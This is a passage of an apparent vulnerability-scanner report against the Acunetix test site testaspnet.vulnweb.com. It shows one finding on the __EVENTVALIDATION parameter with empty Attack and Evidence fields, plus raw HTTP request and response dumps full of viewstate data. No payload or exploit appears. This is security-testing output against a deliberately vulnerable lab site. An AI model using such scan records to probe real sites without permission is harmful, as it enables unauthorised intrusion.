bGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 465 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 Content-Length: 6555 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,555 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLH7tLMBwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo%2BsuXOQO2cYqA7NT0P30nF
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22936
Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 